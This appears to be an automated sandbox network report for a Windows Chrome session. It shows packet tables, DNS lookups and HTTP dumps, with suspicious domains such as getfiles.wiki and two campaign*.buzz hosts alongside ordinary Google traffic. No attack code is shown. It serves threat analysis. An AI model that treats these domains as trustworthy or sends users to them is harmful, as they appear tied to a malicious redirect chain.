                                                                                              Jun 12, 2023 19:07:10.648248911 CEST49711443192.168.2.338.128.66.115
                                                                                              Jun 12, 2023 19:07:10.648313046 CEST4434971138.128.66.115192.168.2.3
                                                                                              Jun 12, 2023 19:07:10.680155039 CEST49709443192.168.2.338.128.66.115
                                                                                              Jun 12, 2023 19:07:10.688198090 CEST49711443192.168.2.338.128.66.115
                                                                                              Jun 12, 2023 19:07:10.769505978 CEST4434971138.128.66.115192.168.2.3
                                                                                              Jun 12, 2023 19:07:10.769638062 CEST4434971138.128.66.115192.168.2.3
                                                                                              Jun 12, 2023 19:07:10.769750118 CEST49711443192.168.2.338.128.66.115
                                                                                              Jun 12, 2023 19:07:10.770349026 CEST49711443192.168.2.338.128.66.115
                                                                                              Jun 12, 2023 19:07:10.770382881 CEST4434971138.128.66.115192.168.2.3
                                                                                              Jun 12, 2023 19:07:10.784701109 CEST44349713149.56.240.132192.168.2.3
                                                                                              Jun 12, 2023 19:07:10.785099983 CEST49713443192.168.2.3149.56.240.132
                                                                                              Jun 12, 2023 19:07:10.785140038 CEST44349713149.56.240.132192.168.2.3
                                                                                              Jun 12, 2023 19:07:10.786606073 CEST44349713149.56.240.132192.168.2.3
                                                                                              Jun 12, 2023 19:07:10.786700964 CEST49713443192.168.2.3149.56.240.132
                                                                                              Jun 12, 2023 19:07:10.792959929 CEST4434970938.128.66.115192.168.2.3
                                                                                              Jun 12, 2023 19:07:10.793066978 CEST4434970938.128.66.115192.168.2.3
                                                                                              Jun 12, 2023 19:07:10.793164968 CEST49709443192.168.2.338.128.66.115
                                                                                              Jun 12, 2023 19:07:10.793668032 CEST49709443192.168.2.338.128.66.115
                                                                                              Jun 12, 2023 19:07:10.793689966 CEST4434970938.128.66.115192.168.2.3
                                                                                              Jun 12, 2023 19:07:10.796809912 CEST49713443192.168.2.3149.56.240.132
                                                                                              Jun 12, 2023 19:07:10.796999931 CEST44349713149.56.240.132192.168.2.3
                                                                                              Jun 12, 2023 19:07:10.797036886 CEST49713443192.168.2.3149.56.240.132
                                                                                              Jun 12, 2023 19:07:10.838231087 CEST49713443192.168.2.3149.56.240.132
                                                                                              Jun 12, 2023 19:07:10.838341951 CEST44349713149.56.240.132192.168.2.3
                                                                                              Jun 12, 2023 19:07:10.879298925 CEST49713443192.168.2.3149.56.240.132
                                                                                              Jun 12, 2023 19:07:10.901192904 CEST44349713149.56.240.132192.168.2.3
                                                                                              Jun 12, 2023 19:07:10.901377916 CEST44349713149.56.240.132192.168.2.3
                                                                                              Jun 12, 2023 19:07:10.901464939 CEST49713443192.168.2.3149.56.240.132
                                                                                              Jun 12, 2023 19:07:10.902066946 CEST49713443192.168.2.3149.56.240.132
                                                                                              Jun 12, 2023 19:07:10.902091026 CEST44349713149.56.240.132192.168.2.3
                                                                                              Jun 12, 2023 19:07:10.942887068 CEST49714443192.168.2.3141.101.120.10
                                                                                              Jun 12, 2023 19:07:10.942980051 CEST44349714141.101.120.10192.168.2.3
                                                                                              Jun 12, 2023 19:07:10.943070889 CEST49714443192.168.2.3141.101.120.10
                                                                                              Jun 12, 2023 19:07:10.944019079 CEST49714443192.168.2.3141.101.120.10
                                                                                              Jun 12, 2023 19:07:10.944061041 CEST44349714141.101.120.10192.168.2.3
                                                                                              Jun 12, 2023 19:07:11.003345013 CEST44349714141.101.120.10192.168.2.3
                                                                                              Jun 12, 2023 19:07:11.003750086 CEST49714443192.168.2.3141.101.120.10
                                                                                              Jun 12, 2023 19:07:11.003813982 CEST44349714141.101.120.10192.168.2.3
                                                                                              Jun 12, 2023 19:07:11.006048918 CEST44349714141.101.120.10192.168.2.3
                                                                                              Jun 12, 2023 19:07:11.006236076 CEST49714443192.168.2.3141.101.120.10
                                                                                              Jun 12, 2023 19:07:11.021665096 CEST49714443192.168.2.3141.101.120.10
                                                                                              Jun 12, 2023 19:07:11.021869898 CEST49714443192.168.2.3141.101.120.10
                                                                                              Jun 12, 2023 19:07:11.021893978 CEST44349714141.101.120.10192.168.2.3
                                                                                              Jun 12, 2023 19:07:11.021979094 CEST44349714141.101.120.10192.168.2.3
                                                                                              Jun 12, 2023 19:07:11.063218117 CEST49714443192.168.2.3141.101.120.10
                                                                                              Jun 12, 2023 19:07:11.063268900 CEST44349714141.101.120.10192.168.2.3
                                                                                              Jun 12, 2023 19:07:11.103220940 CEST49714443192.168.2.3141.101.120.10
                                                                                              Jun 12, 2023 19:07:11.272942066 CEST44349714141.101.120.10192.168.2.3
                                                                                              Jun 12, 2023 19:07:11.273003101 CEST44349714141.101.120.10192.168.2.3
                                                                                              Jun 12, 2023 19:07:11.273094893 CEST49714443192.168.2.3141.101.120.10
                                                                                              Jun 12, 2023 19:07:11.273135900 CEST44349714141.101.120.10192.168.2.3
                                                                                              Jun 12, 2023 19:07:11.273158073 CEST44349714141.101.120.10192.168.2.3
                                                                                              Jun 12, 2023 19:07:11.273202896 CEST49714443192.168.2.3141.101.120.10
                                                                                              Jun 12, 2023 19:07:11.316788912 CEST49714443192.168.2.3141.101.120.10
                                                                                              Jun 12, 2023 19:07:11.316858053 CEST44349714141.101.120.10192.168.2.3
                                                                                              Jun 12, 2023 19:07:11.391232967 CEST49715443192.168.2.3141.101.120.10
                                                                                              Jun 12, 2023 19:07:11.391279936 CEST44349715141.101.120.10192.168.2.3
                                                                                              Jun 12, 2023 19:07:11.391410112 CEST49715443192.168.2.3141.101.120.10
                                                                                              Jun 12, 2023 19:07:11.391670942 CEST49715443192.168.2.3141.101.120.10
                                                                                              Jun 12, 2023 19:07:11.391689062 CEST44349715141.101.120.10192.168.2.3
                                                                                              Jun 12, 2023 19:07:11.445296049 CEST44349715141.101.120.10192.168.2.3
                                                                                              Jun 12, 2023 19:07:11.445588112 CEST49715443192.168.2.3141.101.120.10
                                                                                              Jun 12, 2023 19:07:11.445652008 CEST44349715141.101.120.10192.168.2.3
                                                                                              Jun 12, 2023 19:07:11.448203087 CEST44349715141.101.120.10192.168.2.3
                                                                                              Jun 12, 2023 19:07:11.448329926 CEST49715443192.168.2.3141.101.120.10
                                                                                              Jun 12, 2023 19:07:11.475495100 CEST49715443192.168.2.3141.101.120.10
                                                                                              Jun 12, 2023 19:07:11.475734949 CEST49715443192.168.2.3141.101.120.10
                                                                                              Jun 12, 2023 19:07:11.475754023 CEST44349715141.101.120.10192.168.2.3
                                                                                              Jun 12, 2023 19:07:11.475831032 CEST44349715141.101.120.10192.168.2.3
                                                                                              Jun 12, 2023 19:07:11.541241884 CEST49715443192.168.2.3141.101.120.10
                                                                                              Jun 12, 2023 19:07:11.541276932 CEST44349715141.101.120.10192.168.2.3
                                                                                              Jun 12, 2023 19:07:11.707936049 CEST44349715141.101.120.10192.168.2.3
                                                                                              Jun 12, 2023 19:07:11.708056927 CEST49715443192.168.2.3141.101.120.10
                                                                                              Jun 12, 2023 19:07:11.714725018 CEST49715443192.168.2.3141.101.120.10
                                                                                              Jun 12, 2023 19:07:11.714767933 CEST44349715141.101.120.10192.168.2.3
                                                                                              Jun 12, 2023 19:07:11.733845949 CEST49707443192.168.2.3188.114.97.7
                                                                                              Jun 12, 2023 19:07:11.780293941 CEST44349707188.114.97.7192.168.2.3
                                                                                              Jun 12, 2023 19:07:12.039190054 CEST44349707188.114.97.7192.168.2.3
                                                                                              Jun 12, 2023 19:07:12.039601088 CEST44349707188.114.97.7192.168.2.3
                                                                                              Jun 12, 2023 19:07:12.039696932 CEST49707443192.168.2.3188.114.97.7
                                                                                              Jun 12, 2023 19:07:12.039984941 CEST49707443192.168.2.3188.114.97.7
                                                                                              Jun 12, 2023 19:07:12.040019989 CEST44349707188.114.97.7192.168.2.3
                                                                                              Jun 12, 2023 19:07:12.064527035 CEST49716443192.168.2.335.190.80.1
                                                                                              Jun 12, 2023 19:07:12.064589977 CEST4434971635.190.80.1192.168.2.3
                                                                                              Jun 12, 2023 19:07:12.064676046 CEST49716443192.168.2.335.190.80.1
                                                                                              Jun 12, 2023 19:07:12.064862967 CEST49716443192.168.2.335.190.80.1
                                                                                              Jun 12, 2023 19:07:12.064894915 CEST4434971635.190.80.1192.168.2.3
                                                                                              Jun 12, 2023 19:07:12.126338959 CEST4434971635.190.80.1192.168.2.3
                                                                                              Jun 12, 2023 19:07:12.126833916 CEST49716443192.168.2.335.190.80.1
                                                                                              Jun 12, 2023 19:07:12.126879930 CEST4434971635.190.80.1192.168.2.3
                                                                                              Jun 12, 2023 19:07:12.128158092 CEST4434971635.190.80.1192.168.2.3
                                                                                              Jun 12, 2023 19:07:12.128284931 CEST49716443192.168.2.335.190.80.1
                                                                                              Jun 12, 2023 19:07:12.141904116 CEST49716443192.168.2.335.190.80.1
                                                                                              Jun 12, 2023 19:07:12.142102957 CEST49716443192.168.2.335.190.80.1
                                                                                              Jun 12, 2023 19:07:12.142119884 CEST4434971635.190.80.1192.168.2.3
                                                                                              Jun 12, 2023 19:07:12.182316065 CEST49716443192.168.2.335.190.80.1
                                                                                              Jun 12, 2023 19:07:12.182379961 CEST4434971635.190.80.1192.168.2.3
                                                                                              Jun 12, 2023 19:07:12.222338915 CEST49716443192.168.2.335.190.80.1
                                                                                              Jun 12, 2023 19:07:12.279861927 CEST4434971635.190.80.1192.168.2.3
                                                                                              Jun 12, 2023 19:07:12.279985905 CEST4434971635.190.80.1192.168.2.3
                                                                                              Jun 12, 2023 19:07:12.280050993 CEST49716443192.168.2.335.190.80.1
                                                                                              Jun 12, 2023 19:07:12.280455112 CEST49716443192.168.2.335.190.80.1
                                                                                              Jun 12, 2023 19:07:12.280474901 CEST4434971635.190.80.1192.168.2.3
                                                                                              Jun 12, 2023 19:07:12.281219959 CEST49717443192.168.2.335.190.80.1
                                                                                              Jun 12, 2023 19:07:12.281301022 CEST4434971735.190.80.1192.168.2.3
                                                                                              Jun 12, 2023 19:07:12.281416893 CEST49717443192.168.2.335.190.80.1
                                                                                              Jun 12, 2023 19:07:12.281686068 CEST49717443192.168.2.335.190.80.1
                                                                                              Jun 12, 2023 19:07:12.281709909 CEST4434971735.190.80.1192.168.2.3
                                                                                              Jun 12, 2023 19:07:12.336669922 CEST4434971735.190.80.1192.168.2.3
                                                                                              Jun 12, 2023 19:07:12.337193966 CEST49717443192.168.2.335.190.80.1
                                                                                              Jun 12, 2023 19:07:12.337259054 CEST4434971735.190.80.1192.168.2.3
                                                                                              Jun 12, 2023 19:07:12.337740898 CEST4434971735.190.80.1192.168.2.3
                                                                                              Jun 12, 2023 19:07:12.338310003 CEST49717443192.168.2.335.190.80.1
                                                                                              Jun 12, 2023 19:07:12.338428974 CEST4434971735.190.80.1192.168.2.3
                                                                                              Jun 12, 2023 19:07:12.338434935 CEST49717443192.168.2.335.190.80.1
                                                                                              Jun 12, 2023 19:07:12.380310059 CEST4434971735.190.80.1192.168.2.3
                                                                                              Jun 12, 2023 19:07:12.439466953 CEST49717443192.168.2.335.190.80.1
                                                                                              Jun 12, 2023 19:07:12.497822046 CEST4434971735.190.80.1192.168.2.3
                                                                                              Jun 12, 2023 19:07:12.497950077 CEST4434971735.190.80.1192.168.2.3
                                                                                              Jun 12, 2023 19:07:12.498049974 CEST49717443192.168.2.335.190.80.1
                                                                                              Jun 12, 2023 19:07:12.498250961 CEST49717443192.168.2.335.190.80.1
                                                                                              Jun 12, 2023 19:07:12.498276949 CEST4434971735.190.80.1192.168.2.3
                                                                                              Jun 12, 2023 19:07:18.633564949 CEST44349706216.58.215.228192.168.2.3
                                                                                              Jun 12, 2023 19:07:18.633703947 CEST44349706216.58.215.228192.168.2.3
                                                                                              Jun 12, 2023 19:07:18.633817911 CEST49706443192.168.2.3216.58.215.228
                                                                                              Jun 12, 2023 19:07:19.775959015 CEST49706443192.168.2.3216.58.215.228
                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Jun 12, 2023 19:07:04.402245998 CEST5799053192.168.2.38.8.8.8
                                                                                              Jun 12, 2023 19:07:04.412997007 CEST5238753192.168.2.38.8.8.8
                                                                                              Jun 12, 2023 19:07:04.413042068 CEST5692453192.168.2.38.8.8.8
                                                                                              Jun 12, 2023 19:07:04.436027050 CEST53579908.8.8.8192.168.2.3
                                                                                              Jun 12, 2023 19:07:04.445125103 CEST53523878.8.8.8192.168.2.3
                                                                                              Jun 12, 2023 19:07:04.454072952 CEST53569248.8.8.8192.168.2.3
                                                                                              Jun 12, 2023 19:07:05.653156996 CEST5397553192.168.2.38.8.8.8
                                                                                              Jun 12, 2023 19:07:05.688474894 CEST53539758.8.8.8192.168.2.3
                                                                                              Jun 12, 2023 19:07:05.774899006 CEST5113953192.168.2.38.8.8.8
                                                                                              Jun 12, 2023 19:07:05.807715893 CEST53511398.8.8.8192.168.2.3
                                                                                              Jun 12, 2023 19:07:06.978832006 CEST6058253192.168.2.38.8.8.8
                                                                                              Jun 12, 2023 19:07:07.012687922 CEST53605828.8.8.8192.168.2.3
                                                                                              Jun 12, 2023 19:07:08.553077936 CEST6205053192.168.2.38.8.8.8
                                                                                              Jun 12, 2023 19:07:08.573780060 CEST53620508.8.8.8192.168.2.3
                                                                                              Jun 12, 2023 19:07:10.133701086 CEST5963653192.168.2.38.8.8.8
                                                                                              Jun 12, 2023 19:07:10.133833885 CEST5563853192.168.2.38.8.8.8
                                                                                              Jun 12, 2023 19:07:10.134012938 CEST5770453192.168.2.38.8.8.8
                                                                                              Jun 12, 2023 19:07:10.168836117 CEST53596368.8.8.8192.168.2.3
                                                                                              Jun 12, 2023 19:07:10.175575018 CEST53556388.8.8.8192.168.2.3
                                                                                              Jun 12, 2023 19:07:10.391360998 CEST6532053192.168.2.38.8.8.8
                                                                                              Jun 12, 2023 19:07:10.414721966 CEST53653208.8.8.8192.168.2.3
                                                                                              Jun 12, 2023 19:07:10.906759977 CEST6076753192.168.2.38.8.8.8
                                                                                              Jun 12, 2023 19:07:10.941492081 CEST53607678.8.8.8192.168.2.3
                                                                                              Jun 12, 2023 19:07:11.352027893 CEST5384853192.168.2.38.8.8.8
                                                                                              Jun 12, 2023 19:07:11.387252092 CEST53538488.8.8.8192.168.2.3
                                                                                              Jun 12, 2023 19:07:12.046273947 CEST5757153192.168.2.38.8.8.8
                                                                                              Jun 12, 2023 19:07:12.061003923 CEST53575718.8.8.8192.168.2.3
                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                              Jun 12, 2023 19:07:04.402245998 CEST192.168.2.38.8.8.80x5511Standard query (0)getfiles.wikiA (IP address)IN (0x0001)false
                                                                                              Jun 12, 2023 19:07:04.412997007 CEST192.168.2.38.8.8.80x20f5Standard query (0)accounts.google.comA (IP address)IN (0x0001)false
                                                                                              Jun 12, 2023 19:07:04.413042068 CEST192.168.2.38.8.8.80x4ab0Standard query (0)clients2.google.comA (IP address)IN (0x0001)false
                                                                                              Jun 12, 2023 19:07:05.653156996 CEST192.168.2.38.8.8.80x6fcdStandard query (0)exturl.comA (IP address)IN (0x0001)false
                                                                                              Jun 12, 2023 19:07:05.774899006 CEST192.168.2.38.8.8.80xbcedStandard query (0)chrome.google.comA (IP address)IN (0x0001)false
                                                                                              Jun 12, 2023 19:07:06.978832006 CEST192.168.2.38.8.8.80xad6dStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                              Jun 12, 2023 19:07:08.553077936 CEST192.168.2.38.8.8.80x982fStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                              Jun 12, 2023 19:07:10.133701086 CEST192.168.2.38.8.8.80x5a1bStandard query (0)campaignkejfcv.buzzA (IP address)IN (0x0001)false
                                                                                              Jun 12, 2023 19:07:10.133833885 CEST192.168.2.38.8.8.80xe4efStandard query (0)campaignkeepy.buzzA (IP address)IN (0x0001)false
                                                                                              Jun 12, 2023 19:07:10.134012938 CEST192.168.2.38.8.8.80x4199Standard query (0)s10.histats.comA (IP address)IN (0x0001)false
                                                                                              Jun 12, 2023 19:07:10.391360998 CEST192.168.2.38.8.8.80x74c7Standard query (0)s4.histats.comA (IP address)IN (0x0001)false
                                                                                              Jun 12, 2023 19:07:10.906759977 CEST192.168.2.38.8.8.80xb0b9Standard query (0)e.dtscout.comA (IP address)IN (0x0001)false
                                                                                              Jun 12, 2023 19:07:11.352027893 CEST192.168.2.38.8.8.80x7c88Standard query (0)t.dtscout.comA (IP address)IN (0x0001)false
                                                                                              Jun 12, 2023 19:07:12.046273947 CEST192.168.2.38.8.8.80xa54bStandard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                              Jun 12, 2023 19:07:04.436027050 CEST8.8.8.8192.168.2.30x5511No error (0)getfiles.wiki188.114.97.7A (IP address)IN (0x0001)false
                                                                                              Jun 12, 2023 19:07:04.436027050 CEST8.8.8.8192.168.2.30x5511No error (0)getfiles.wiki188.114.96.7A (IP address)IN (0x0001)false
                                                                                              Jun 12, 2023 19:07:04.445125103 CEST8.8.8.8192.168.2.30x20f5No error (0)accounts.google.com216.58.215.237A (IP address)IN (0x0001)false
                                                                                              Jun 12, 2023 19:07:04.454072952 CEST8.8.8.8192.168.2.30x4ab0No error (0)clients2.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                              Jun 12, 2023 19:07:04.454072952 CEST8.8.8.8192.168.2.30x4ab0No error (0)clients.l.google.com172.217.168.14A (IP address)IN (0x0001)false
                                                                                              Jun 12, 2023 19:07:05.688474894 CEST8.8.8.8192.168.2.30x6fcdNo error (0)exturl.com38.128.66.115A (IP address)IN (0x0001)false
                                                                                              Jun 12, 2023 19:07:05.807715893 CEST8.8.8.8192.168.2.30xbcedNo error (0)chrome.google.comwww3.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                              Jun 12, 2023 19:07:05.807715893 CEST8.8.8.8192.168.2.30xbcedNo error (0)www3.l.google.com142.250.203.110A (IP address)IN (0x0001)false
                                                                                              Jun 12, 2023 19:07:07.012687922 CEST8.8.8.8192.168.2.30xad6dNo error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                                                                              Jun 12, 2023 19:07:07.012687922 CEST8.8.8.8192.168.2.30xad6dNo error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                                                                              Jun 12, 2023 19:07:07.012687922 CEST8.8.8.8192.168.2.30xad6dNo error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                                                                              Jun 12, 2023 19:07:07.012687922 CEST8.8.8.8192.168.2.30xad6dNo error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                                                                              Jun 12, 2023 19:07:08.573780060 CEST8.8.8.8192.168.2.30x982fNo error (0)www.google.com216.58.215.228A (IP address)IN (0x0001)false
                                                                                              Jun 12, 2023 19:07:10.168836117 CEST8.8.8.8192.168.2.30x5a1bNo error (0)campaignkejfcv.buzz38.128.66.115A (IP address)IN (0x0001)false
                                                                                              Jun 12, 2023 19:07:10.168921947 CEST8.8.8.8192.168.2.30x4199No error (0)s10.histats.coms10.histats.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                              Jun 12, 2023 19:07:10.175575018 CEST8.8.8.8192.168.2.30xe4efNo error (0)campaignkeepy.buzz38.128.66.115A (IP address)IN (0x0001)false
                                                                                              Jun 12, 2023 19:07:10.414721966 CEST8.8.8.8192.168.2.30x74c7No error (0)s4.histats.com149.56.240.132A (IP address)IN (0x0001)false
                                                                                              Jun 12, 2023 19:07:10.414721966 CEST8.8.8.8192.168.2.30x74c7No error (0)s4.histats.com149.56.240.131A (IP address)IN (0x0001)false
                                                                                              Jun 12, 2023 19:07:10.414721966 CEST8.8.8.8192.168.2.30x74c7No error (0)s4.histats.com54.39.156.32A (IP address)IN (0x0001)false
                                                                                              Jun 12, 2023 19:07:10.414721966 CEST8.8.8.8192.168.2.30x74c7No error (0)s4.histats.com149.56.240.127A (IP address)IN (0x0001)false
                                                                                              Jun 12, 2023 19:07:10.414721966 CEST8.8.8.8192.168.2.30x74c7No error (0)s4.histats.com149.56.240.31A (IP address)IN (0x0001)false
                                                                                              Jun 12, 2023 19:07:10.414721966 CEST8.8.8.8192.168.2.30x74c7No error (0)s4.histats.com149.56.240.27A (IP address)IN (0x0001)false
                                                                                              Jun 12, 2023 19:07:10.414721966 CEST8.8.8.8192.168.2.30x74c7No error (0)s4.histats.com54.39.128.162A (IP address)IN (0x0001)false
                                                                                              Jun 12, 2023 19:07:10.414721966 CEST8.8.8.8192.168.2.30x74c7No error (0)s4.histats.com149.56.240.128A (IP address)IN (0x0001)false
                                                                                              Jun 12, 2023 19:07:10.414721966 CEST8.8.8.8192.168.2.30x74c7No error (0)s4.histats.com149.56.240.130A (IP address)IN (0x0001)false
                                                                                              Jun 12, 2023 19:07:10.414721966 CEST8.8.8.8192.168.2.30x74c7No error (0)s4.histats.com149.56.240.129A (IP address)IN (0x0001)false
                                                                                              Jun 12, 2023 19:07:10.414721966 CEST8.8.8.8192.168.2.30x74c7No error (0)s4.histats.com54.39.128.117A (IP address)IN (0x0001)false
                                                                                              Jun 12, 2023 19:07:10.941492081 CEST8.8.8.8192.168.2.30xb0b9No error (0)e.dtscout.com141.101.120.10A (IP address)IN (0x0001)false
                                                                                              Jun 12, 2023 19:07:10.941492081 CEST8.8.8.8192.168.2.30xb0b9No error (0)e.dtscout.com141.101.120.11A (IP address)IN (0x0001)false
                                                                                              Jun 12, 2023 19:07:11.387252092 CEST8.8.8.8192.168.2.30x7c88No error (0)t.dtscout.com141.101.120.10A (IP address)IN (0x0001)false
                                                                                              Jun 12, 2023 19:07:11.387252092 CEST8.8.8.8192.168.2.30x7c88No error (0)t.dtscout.com141.101.120.11A (IP address)IN (0x0001)false
                                                                                              Jun 12, 2023 19:07:12.061003923 CEST8.8.8.8192.168.2.30xa54bNo error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                              • clients2.google.com
                                                                                              • accounts.google.com
                                                                                              • getfiles.wiki
                                                                                              • chrome.google.com
                                                                                              • exturl.com
                                                                                              • https:
                                                                                                • api.ipify.org
                                                                                                • campaignkeepy.buzz
                                                                                                • campaignkejfcv.buzz
                                                                                                • s4.histats.com
                                                                                                • e.dtscout.com
                                                                                                • t.dtscout.com
                                                                                              • a.nel.cloudflare.com
                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              0192.168.2.349699172.217.168.14443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              2023-06-12 17:07:05 UTC0OUTGET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.81&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1
                                                                                              Host: clients2.google.com
                                                                                              Connection: keep-alive
                                                                                              X-Goog-Update-Interactivity: fg
                                                                                              X-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda
                                                                                              X-Goog-Update-Updater: chromecrx-104.0.5112.81
                                                                                              Sec-Fetch-Site: none
                                                                                              Sec-Fetch-Mode: no-cors
                                                                                              Sec-Fetch-Dest: empty
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              2023-06-12 17:07:05 UTC1INHTTP/1.1 200 OK
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-T0FAj2SGbzb6qreLxh15MA' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Mon, 12 Jun 2023 17:07:05 GMT
                                                                                              Content-Type: text/xml; charset=UTF-8
                                                                                              X-Daynum: 6006
                                                                                              X-Daystart: 36425
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              Server: GSE
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Accept-Ranges: none
                                                                                              Vary: Accept-Encoding
                                                                                              Connection: close
                                                                                              Transfer-Encoding: chunked
                                                                                              2023-06-12 17:07:05 UTC2INData Raw: 32 63 39 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 67 75 70 64 61 74 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 75 70 64 61 74 65 32 2f 72 65 73 70 6f 6e 73 65 22 20 70 72 6f 74 6f 63 6f 6c 3d 22 32 2e 30 22 20 73 65 72 76 65 72 3d 22 70 72 6f 64 22 3e 3c 64 61 79 73 74 61 72 74 20 65 6c 61 70 73 65 64 5f 64 61 79 73 3d 22 36 30 30 36 22 20 65 6c 61 70 73 65 64 5f 73 65 63 6f 6e 64 73 3d 22 33 36 34 32 35 22 2f 3e 3c 61 70 70 20 61 70 70 69 64 3d 22 6e 6d 6d 68 6b 6b 65 67 63 63 61 67 64 6c 64 67 69 69 6d 65 64 70 69 63 63 6d 67 6d 69 65 64 61 22 20 63 6f 68 6f 72 74 3d 22 31 3a 3a 22 20 63 6f 68 6f 72 74 6e 61 6d 65 3d 22 22
                                                                                              Data Ascii: 2c9<?xml version="1.0" encoding="UTF-8"?><gupdate xmlns="http://www.google.com/update2/response" protocol="2.0" server="prod"><daystart elapsed_days="6006" elapsed_seconds="36425"/><app appid="nmmhkkegccagdldgiimedpiccmgmieda" cohort="1::" cohortname=""
                                                                                              2023-06-12 17:07:05 UTC3INData Raw: 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 68 61 73 68 5f 73 68 61 32 35 36 3d 22 38 31 65 33 61 34 64 34 33 61 37 33 36 39 39 65 31 62 37 37 38 31 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 70 72 6f 74 65 63 74 65 64 3d 22 30 22 20 73 69 7a 65 3d 22 32 34 38 35 33 31 22 20 73 74 61 74 75 73 3d 22 6f 6b 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 2e 30 2e 36 22 2f 3e 3c 2f 61 70 70 3e 3c 2f 67 75 70 64 61 74 65 3e 0d 0a
                                                                                              Data Ascii: 723f56b8717175c536685c5450122b30789464ad82" hash_sha256="81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82" protected="0" size="248531" status="ok" version="1.0.0.6"/></app></gupdate>
                                                                                              2023-06-12 17:07:05 UTC3INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              1192.168.2.349697216.58.215.237443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              2023-06-12 17:07:05 UTC0OUTPOST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1
                                                                                              Host: accounts.google.com
                                                                                              Connection: keep-alive
                                                                                              Content-Length: 1
                                                                                              Origin: https://www.google.com
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Sec-Fetch-Site: none
                                                                                              Sec-Fetch-Mode: no-cors
                                                                                              Sec-Fetch-Dest: empty
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Cookie: CONSENT=PENDING+904; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg
                                                                                              2023-06-12 17:07:05 UTC1OUTData Raw: 20
                                                                                              Data Ascii:
                                                                                              2023-06-12 17:07:05 UTC3INHTTP/1.1 200 OK
                                                                                              Content-Type: application/json; charset=utf-8
                                                                                              Access-Control-Allow-Origin: https://www.google.com
                                                                                              Access-Control-Allow-Credentials: true
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Mon, 12 Jun 2023 17:07:05 GMT
                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
